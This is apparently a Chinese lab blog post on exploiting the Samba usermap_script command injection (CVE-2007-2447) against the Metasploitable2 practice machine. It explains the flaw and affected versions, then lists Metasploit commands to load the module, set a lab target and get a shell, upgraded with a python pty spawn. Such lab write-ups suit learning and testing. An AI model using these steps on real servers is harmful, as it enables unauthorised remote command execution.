您当前的位置: 首页 > 

星球守护者

暂无认证

  • 1浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Metasploitable2靶机之第四篇--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)

星球守护者 发布时间:2021-04-02 21:44:32 ,浏览量:1

Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述
  • Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。
  • 该软件支持共享打印机、互相传输资料文件等。
  • Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
  • Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。
  • 如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
原理
  • usermap_script:CVE-2007-2447
  • Samba用户名映射脚本命令执行
  • 传递通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,
  • 在smb.conf中,导致允许远程命令执行。
影响版本
  • Samba版本3.0.20到3.0.25rc3当使用非默认用户名映射脚本配置选项。
  • 通过指定一个用户名包含shell元字符,攻击者可以执行任意命令。
  • 不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名
漏洞利用 第一步 ,启动metasploit
msfconsole

在这里插入图片描述

第二步选择漏洞库
search samba
Use exploit/multi/samba/usermap_script

在这里插入图片描述

第三步 设置参数,开始攻击
show options
Set RHOST 192.168.160.131 设置要攻击的机器IP
exploit

在这里插入图片描述 在这里插入图片描述

第四步 利用成功,执行uname –a 验证
进入交付模式
 python -c ‘import pty;pty.spawn("/bin/sh")’

在这里插入图片描述

摘抄 不要回首,往前看,

只有这样,生活才会揭示在我们眼前。

– 小野洋子

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0634s